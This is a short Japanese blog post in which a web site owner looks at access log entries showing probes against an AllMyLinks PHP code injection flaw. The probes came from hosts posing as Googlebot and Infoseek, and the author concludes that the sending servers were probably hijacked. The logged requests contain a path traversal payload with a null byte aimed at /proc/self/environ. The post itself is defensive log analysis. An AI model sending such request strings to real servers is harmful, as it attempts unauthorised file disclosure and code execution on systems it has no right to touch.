Webログ: footer.inc.php と _AMLconfig

先ほど、Webサーバーのログ画面を眺めていたら、また訳のわからないログが残ってる。しかも、googlebot を偽装しているみたい。

grupogestion.vservers.es - - [22/Oct/2012:00:53:31 +0900] "GET //include/footer.inc.php?_AMLconfig[cfg_serverpath]=../../../../../../../../../../../../..//proc/self/environ%0000 HTTP/1.1" 404 1113 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
grupogestion.vservers.es - - [22/Oct/2012:00:53:31 +0900] "GET /mmdrv//include/footer.inc.php?_AMLconfig[cfg_serverpath]=../../../../../../../../../../../../..//proc/self/environ%0000 HTTP/1.1" 404 1113 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"

「footer.inc.php」とそれに続く「_AMLconfig」がキーワードになりそうなので、検索してみたが、

******** AllMyLinks PHP Code Injection vulnerability ********
Product : AllMyLinks

というページが何カ所か見つかった。
しらみつぶしに、このAllMyLinks というPHP コードを使っているサイトを探して侵入の手口を見つけようというのか?

このログの直後に、別のIPアドレスから、「footer.inc.php」と「_AMLconfig」を含む同じようなアクセスが、今度は Infoseek を偽装して発生している。

server.jeffmellon.com - - [22/Oct/2012:00:53:47 +0900] "GET /mmdrv//include/footer.inc.php?_AMLconfig[cfg_serverpath]=../../../../../../../../../../../../..//proc/self/environ%0000 HTTP/1.1" 404 1113 "-" "Infoseek SideWinder/2.0B (Linux 2.4 i686)"
server.jeffmellon.com - - [22/Oct/2012:01:00:44 +0900] "GET /mmdrv/man_win02.html%22%20target=%22_blank//include/footer.inc.php?_AMLconfig[cfg_serverpath]=../../../../../../../../../../../../..//proc/self/environ%0000 HTTP/1.1" 404 1113 "-" "Infoseek SideWinder/2.0B (Linux 2.4 i686)"

おまけに、正式に登録されている grupogestion.vservers.es と server.jeffmellon.com というサーバーらしきホスト名からHTTPアクセスが発生しているということは、これらのホストは誰かに乗っ取られているか、外からリモートコントロール可能な状態にあるってことが考えられる。

今回は、404 の Not Found で一蹴されているからいいけど、他人が作ったスクリプトをそのまま利用させて貰っている立場としては、更新フラグが立ったら素早くパッチや更新作業を行わないと怖いと感じるところ。

コメントを残す